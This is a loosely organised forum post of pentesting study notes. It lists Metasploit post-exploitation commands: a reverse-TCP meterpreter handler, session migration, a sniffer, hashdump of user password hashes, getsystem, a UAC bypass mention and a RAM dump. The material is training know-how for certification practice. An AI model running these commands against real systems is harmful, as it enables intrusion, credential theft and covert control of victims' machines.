Hello:grinning:, good to everyone I leave some of the commands and tips I have collected throughout my studies and pentesting certifications, everything can be useful.The post is probably not very organized, I’m sorry for that but it can serve you many things for your pentesting.
If you would like to learn hacking and pentesting I recommend some machines that are very complete and serve to practice many different techniques are: Nebula and Protostar
Nebula: It takes a look at + SUID files + Permissions + Race conditions + Shell meta-variables + $PATH weaknesses + Scripting language weaknesses + Binary compilation failures At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.
Dradis-Framework(Create Reporte One-Click): https://dradisframework.com/ce/
Some of the modules of metasploit
background - Then interact with a session
sessions s-i 2 (Identifier)
meterpreter > load -l
meterpreter > load sniffer
migrate PID -> to migrate the process through the PID
basically means the phases of operation once a victim’s system has been compromised by the attacker.
If we already have a compromised machine and we want to see all the modules of post exploitation, only with type post / windows + enter we can see the modules that metasploit offers us
This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected. Currently, meterpreter/reverse_tcp is used on Windows and Linux, with python/meterpreter/reverse_tcp’ used on all others.
post/windows/gather/enum_logged_on_users(view logged users)
post/windows/gather/checkvm (check if it is a virtual machine)
post/windows/gather/win_privs (scale privileges)
If we need a reverse shell from metasploit we can use multi handler, for example, suppose we already have the machine compromised but we do not have a reverse shell, we follow these steps
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.99.243(ip example)
set LPORT 4444
exploit -j (sending PID to Background)
jobs(we will be what are the processes that are running in the background)
server in python(2.7)
python -m SimpleHTTPServer 8000
server in python(3.x)
python -m http.server 8000
Some of the methodologies when we have gained access to a machine and we have a user with low privileges and of course we want to get root. Suppose we have an exploit to launch and we escalate privileges
we have got privileges and be NT / AUTHORITY-SYSTEM
We can see all user hashes by typing hashdump.
also if we have a local exploit and we launch it for example a bypass of uac, it is probably exploitable in windows7 without patching
load -l (the list of services we can upload)
set session 5 (connect to session number 5)
getsystem(we can test if we get root automatically)
load_sniffer(we load a sniffer)
you could investigate more about sniffer its other options that it has
Do not forget that while you load more services in the process the meterpreter’s memory grows, a good option is to migrate to another process also in case of losing the session for example:
You can also use this module of metasploit to inject the meterpreter in all the processes that can be:
If we want to dump the victim’s ram
set Session x
set REXEPATH C:
I hope something is helpful, thanks